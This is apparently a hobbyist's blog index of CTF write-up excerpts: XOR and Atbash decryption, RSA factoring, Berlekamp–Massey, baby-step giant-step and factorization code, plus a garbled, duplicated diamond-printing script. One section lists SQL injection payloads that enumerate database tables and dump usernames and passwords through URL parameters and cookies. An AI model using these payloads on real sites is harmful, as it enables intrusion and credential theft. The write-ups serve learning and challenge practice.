
InCTF 2014 - Crypto 100

There are three files, one.txt, one.txt.enc and second.txt.enc. Challenge is to decrypt the second.txt.enc using the key. So we got a message + cipher, so we got a hint that operation done using XOR. So XORing (Message ^ Cipher) = Key. #!/usr/bin/env python import hashlib """ one.txt This sentence is encrypted using XOR cipher. """ plain_text = open('one.txt','r').read().strip() """ one.txt.enc LAcbGEUKHQEGDgsaHU8bGEUcFgwAEhUNHQtSHhYQFghSMyorWAwbGw0cCkE= """ cipher_text = open('one.txt.enc','r').read().decode("base64") print plain_text print '---------------------------------------------------------------------' print cipher_text print '---------------------------------------------------------------------' plain_text = [ord(i) for i in plain_text] cipher_text = [ord(i) for i in cipher_text] key = '' for i in range(len(plain_text)): c = ((plain...

InCTF 2014 - Crypto 50

Question: Zgyzhsxrksvi dzh lirtrmzoob wvevolkvw uli gsv Svyivd ozmtfztv. Gsv pvb uli gsrh ovevo rh svyivd. Given Hint: The Atbash cipher is a very common, simple cipher. It was for the Hebrew alphabet, but modified here to work with the English alphabet. Basically, when encoded, an "A" becomes a "Z", "B" turns into "Y", etc. The Atbash cipher can be implemented as an Affine cipher by setting both "a" and "b" to 25. We used online  tool  to decrypt the encoded message. This is your encoded/decoded text: Atbash   cipher was originally developed for the Hebrew language. The key for this level is hebrew.

Nullcon HackIM 2014 - Programming 100 Writeup

''' Well I am a beginner. netcat 2002 Welcome Enter 20 spam words to authenticate yourself. 01/20: spam 02/20: maps 03/20: hot Authenticate failed. hot(125) is not a palprime. (Hint) Tried with different test cases and found the value for each alphabet. Since in the challenge only lower-case should be used (condition). so I written a big program ( Once again I am a beginner, to find the palprime words available in dictionary. For the words list I downloaded the dataset from Thank you !!! ''' #!/usr/bin/python import string import sys,math import random my_dict ={} a =1 s = 361 t = 762 - s - a n = 196 b = 405 - a -t c = 410 - a - t d =213 - a - n e = 426 - a -t f = 437 -a -t g = 306 - 1 -256 i = 442 - s h = 506 - i - s j = 525 - e -t k = 627 -i -t -e l = 738 -i -g -h -t p = 256 m = 169 o = 274 - g u = 833 - 2*n q = 1211 - u -i -t r = 918 -i -g -h -t v = 885 -a -t w = 651 -i -d -e x = 962 -e -s y = 1587 -e -s -x z = 103...

Berlekamp–Massey algorithm

The Berlekamp–Massey algorithm is an algorithm that will find the shortest linear feedback shift register for a given binary output sequence. The algorithm will also find the minimal polynomial of a linearly recurrent sequence in an arbitrary field. I have used sage for computing this program. # Berlekamp-Massey Algorithm #from __future__ import print_function s = [GF(2)(0), 0, 1, 0, 0, 0, 0, 0, 1, 1, 0] #input sequence n = len(s) C = [GF(2)(1)] B = [GF(2)(1)] temp = [] T = [] L = 0 N = 0 m = -1 print '----- n',n print '-----------------------------------------------------------------------' while N < n: temp = B d = s[N] for i in range(1,L+1): d = d + C[i]*s[N-i] print '----- d ',d if d == 1: T = C temp = [ 0 for i in range(int(N-m))] + temp if len(C) < len(temp): C = C + [0 for i in range(len(temp)-len(C))] else: temp = temp +...

Factorization Problems

""" TRAIL and DIVISION METHOD with PRIME_SIEVE """ def primes_sieve(limit): a = [True] * limit # Initialize the primality list a[0] = a[1] = False for (i, isprime) in enumerate(a): if isprime: yield i for n in xrange(i*i, limit, i): # Mark factors non-prime a[n] = False def trial_division(n): """Return a list of the prime factors for a natural number.""" if n == 1: return [1] primes = primes_sieve(int(pow(n,0.5)) + 1) # Prime factor is always less than SQRT(n)+1 prime_factors = [] for p in primes: if p*p > n: break while n % p == 0: prime_factors.append(p) n //= p if n > 1: prime_factors.append(n) return prime_factors t = trial_division(600851475143) print t Fermat Theorem import math def gcd(a, b): while a != b: if a > b: ...

Baby Step Giant Step Algorithm Python Code

#Baby Step Giant Step DLP problem y = a**x mod n #Example 70 = 2**x mod 131 y = 70 a = 2 n = 131 s = floor(sqrt(n)) A = [] B = [] for r in range(0,s): value = y*(a^r) % n A.append(value) for t in range(1,s+1): value = a^(t*s) % n B.append(value) print A print B x1,x2 =0,0 for r in A: for t in B: if r == t: x1 = A.index(r) x2 = B.index(t) print x1,x2 break print 'the value of x is ', ((x2+1)*s - x1) % n # Answer

rivest-shamir-adleman-250 writeup ( 2013)

## using SAGE RSA n = 80646413 p = floor(sqrt(80646413)) ### Finding Factor p*q = n while(true): if (n%p == 0): print p break p=p+1 q = n / p print q #### phi(n) n1 = (p-1) * (q-1) print n1 e =5 d = e^-1 % n1 print d ### got private key ###Fast Exponentiation Algorithms def expo(c,d,n): if (d==1): return c%n if (d==2): return c*c % n if (d%2==0): return expo(expo(c,d/2,n),2,n) else: return c*expo(expo(c,(d-1)/2,n),2,n) cipher = [72895864,15633602,38820479,60303684,7458706,60299530,20682371,54642689,26066811,32615038,35349196,76400140,38820479,56463813,80491201,76400140,35349196,69567074,26066811,76400140,74270178,76127647,76127647,15633602,76400140,60303684,38820479,56463813,60303684,76400140,72844764,76127647,69302434,15633602,80491201,76400140,6809712,26066811,76400140,42498798,60299530,76127647,69302434,80491201,33234011] flag = '' for c in cipher: flag = flag+ chr(ex...

SQL injection My First Try

id=4  UNION ALL SELECT 1,2,3 id=4  UNION ALL SELECT 1,table_name,3 from information_schema.tables id=4  UNION ALL SELECT 1,column_name,3 from information_schema.columns id=4  UNION ALL SELECT 1,username,password from users Another is by COOKIES in PHP <query> = '$username' ' UNION ALL SELECT 1,2;# ' UNION ALL SELECT table_name,3 from information_schema.tables;# ' UNION ALL SELECT column_name,1 from information_schema.columns;# ' UNION ALL SELECT login, password from users;# i BASE64 convertor TAMPER DATA in MOZILA browser to inject it

diamond format '*' program in python

print(" Diamond Format \n") val = eval(input('Enter the value ')) k=val//2 j=0 for i in range(1,val,2): print(' '*k,end='') print('*'*i)print(" Diamond Format \n") val = eval(input('Enter the value ')) k=val//2 j=0 for i in range(1,val,2): print(' '*k,end='') print('*'*i) k=k-1 j=i j=j-2 k=2 #print(' ',j) for j in range(j,0,-2): print(' '*k,end='') print('*'*j) k=k+1 k=k-1 j=i j=j-2 k=2 #print(' ',j) for j in range(j,0,-2): print(' '*k,end='') print('*'*j) k=k+1

தமிழ் - Tamil Nadu

Courtesy :  Wiki Tamilnadu and Facebook Page